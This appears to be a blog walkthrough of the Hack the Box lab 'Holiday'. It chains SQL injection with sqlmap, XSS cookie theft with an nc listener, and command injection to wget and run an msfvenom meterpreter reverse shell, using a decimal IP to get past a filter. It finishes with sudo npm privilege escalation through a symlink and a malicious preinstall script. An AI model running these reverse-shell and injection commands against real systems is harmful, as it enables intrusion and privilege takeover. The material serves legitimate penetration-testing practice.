Hello friends!! Today we are going to solve another
CTF challenge “Holiday” which is available online for those who want to
increase their skill in penetration testing and black box testing. Holiday is
retired vulnerable lab presented by Hack the Box for making online penetration
practices according to your experience level; they have the collection of
vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file
on victim’s machine.
Since these labs are online available therefore they
have static IP and IP of sense is 10.10.10.25 so let’s begin with nmap port
enumeration.
nmap
-A -p- 10.10.10.25 –open
From given below image, you can observe we
found port 22 and 8000 are open on target system.
As port 8000 is running http we open the IP
address in the browser, and find a webpage.
We don’t find anything on the webpage so we
use dirb to enumerate the directories.
dirb
http://192.168.102:8000
Dirb
scan gives us a link to a directory called /login, we open the link and find a
login page.
We capture the login request using
burpsuite. We use random credentials as placeholder.
We use sqlmap to check if it is vulnerable
to sql injection. After finding that it is vulnerable to sql injection, we use
sqlmap to dump the database and find a username “RickA” and password hash.
sqlmap
-r sql.txt –dbms=SQLite -T users --columns –dump --batch
We use hashkiller.co.uk to decrypt the hash
and find the password to the user.
We login using these credentials and we are
redirected to a page with that looks like it contains user information.
We click on one of the UUID link and find a
page that we can post notes for the users. It also shows that it will take up
to 1 minute to post the note.
We try exploit the note function, and find
it is vulnerable xss. As the notes are being read by administrator xss can be
used to get the admin cookie. To run xss and run our payload we need to bypass
the filter using java script function String.fromCharCode to run our payload. I
created this script here to
convert string to ascii code.
We post the note to bypass the filter we
have to use this payload:
We setup our listener using nc on port 80,
as we will receive the the response of the page including the administrator
cookie on this port.
nc
-lvp 80
After waiting for 1 minute we received the
admin cookie.
The cookie is url encoded we decode and use
it hijack the administrator session.
We capture the webpage’s request using
burpsuite. We change our cookie with that of administrator and forward it.
As
soon as we forward the request, we are able to successfully hijack the administrator
session.
We now go to /admin directory and find a
page where there are options to export bookings and notes.
We capture the request using burpsuite, and
check if it is vulnerable to any king of injection. After enumerating we find
that this page is vulnerable to command injection.
We are unable to get a shell using
web_delivery module of metaploit due to there being filters. Now we create a
payload using msfvenom to upload into the target machine using command
injection and get reverse shell.
msfvenom
-p linux/x86/meterpreter/reverse_tcp lhost=10.10.14.8 lport=4444 –f elf >
shell
After creating a shell we create a python
http server to upload into the target machine.
Now “.” Is not blacklisted so we convert
the ipaddress into decimal number so that we can bypass the filter.
We upload the shell using wget command into
the target machine and save it in /tmp directory.
As soon as we run the command we get a
prompt that shell is uploaded.
We give our payload read, write and execute
permission using command injection.
Now we setup our listener using metasploit.
msf
> use exploit/multi/handler
msf
exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf
exploit(multi/handler) > set lhost 10.10.14.8
msf
exploit(multi/handler) > set lport 4444
msf
exploit(multi/handler) > run
We run the shell using command injection
vulnerability on the target machine.
As soon as we run the shell we get a
reverse shell.
We spawn a tty shell and take a look at the
sudoers list and find that we can run /usr/bin/npm I * as root with no
password.
python
-c “import pty; pty.spawn(‘/bin/bash’)”
sudo
-l
Before trying to get root shell we first enumerate
rest of the directories and find a file called “user.txt” in /home/algernon
directory. We take a look at the content of the files and find the first flag.
Now we try to take root.txt we go to /app
directory. We rename package.json to pack, and symlink /root/root.txt
package.json
ln
-s /root/root.txt package.json
We run /usr/bin/npm i * as root user and
find the final flag.
After searching through google we find a
way to get reverse shell using a package called rimrafall.
We setup rimrafall by following the
instructions given on the webpage.
We setup the json file and change the
preinstalled script to bash one liner.
We run the command as root user to get
privileged shell.
sudo
npm i rimrafall --unsafe
We setup the listener as soon as we run the
preinstalled shell is getting executed we get a reverse shell.
nc
–nvlp 1234
We go to /root directory and find a file
called root.txt. We take a look at the content of the file and find the final
flag.
0 comments:
Post a Comment